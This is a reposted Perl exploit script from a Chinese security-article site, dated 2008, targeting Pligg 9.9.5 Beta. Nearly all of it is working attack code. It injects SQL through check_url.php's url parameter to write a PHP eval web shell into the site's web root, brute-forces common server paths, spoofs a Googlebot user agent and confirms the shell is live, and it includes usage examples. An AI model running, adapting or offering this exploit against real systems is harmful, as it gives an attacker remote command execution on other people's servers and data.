Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit

来源：ax330d [doggy] gmail [dot] com 作者：Ams 发布时间：2008-12-23

#!/usr/bin/perl

=about

Pligg 9.9.5 Beta Perl exploit

AUTHOR
discovered & written by Ams
ax330d [doggy] gmail [dot] com

VULN. DESCRIPTION:
Vulnerability hides in 'evb/check_url.php'
unfiltered $_GET['url'] parameter.
Actually, it has filtration.
Filtration strips tags and converts html
special chars , but it is not enough,
because we can use MySQLs CHAR() function
to convert shell to allowed chars.

EXPLOIT WORK:
Firtsly, exploit tryes to get full server
path, but if not succeeded, then it will brute it.
If path has been found then exploit will try
to upload tiny shell via SQl-Injection.

REQUIREMENTS:
MySQL should be able to write to file.
Know full server path to portal.
magiq_quotes_gpc=off

=cut

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

Banner();

$| = 1;
my $expl_url = shift or Usage();
my $serv_path = shift || '';

my $spider = LWP::UserAgent->new;
$spider->timeout( 9 );
$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');

my $def_shell = '/libs/manager.php';
my $shell = q(<?php @eval(base64_decode($_GET['cmd']));?>);
my $sql_shell = join ',', map { ord } split //, $shell;

my @paths = qw(
/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts
/home/www /home/httpd/vhosts
/usr/local/apache/htdocs
/www/htdocs
);

exploit( $expl_url );

sub exploit {

$_ = shift;
print "\n\tExploiting: $_";

my ( $packet, $rcvd, $injection );
my ( $prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};

my $req = GET "$prot://$host$path/evb/check_url.php";
my $res = $spider->request( $req );
$serv_path = $res->content =~ /template\s+in\s+(.*?)config\.php/
? $1
: $serv_path;

if ( $serv_path ne '' ) {

print "\n\tFound server path: $serv_path";

chomp( $serv_path );
$injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$def_shell'-- ";
$req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection );
$res = $spider->request( $req );

} else {

print "\n\tUnable to find path, starting bruteforce...\n";

for $serv_path ( @paths ) {

printf "\tTrying: $serv_path$path$def_shell %s\r", ' ' x 10;

chomp( $serv_path );
$injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$path$def_shell'-- ";
$req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection );
$res = $spider->request( $req );
}
}

# Checking for shell presence
$req = HEAD "http://$host$path$def_shell";
$res = $spider->request( $req );

if ( $res->status_line =~ /200/ ) {
print "\n\tExploited: http://$host$path$def_shell\n\n";
} else {
print "\n\tExploiting failed\n\n";
}

}

# Light wheel...
sub Url_Encode {
$_ = shift;
s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
return $_;
}

sub Usage {
print "\n\tUsage:\t$0 http://site.com [full server path]

Example:
$0 http://localhost/ /var/www/htdocs
$0 http://localhost/\n\n";
exit;
}

sub Banner {
print "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Pligg 9.9.5 Beta Perl exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告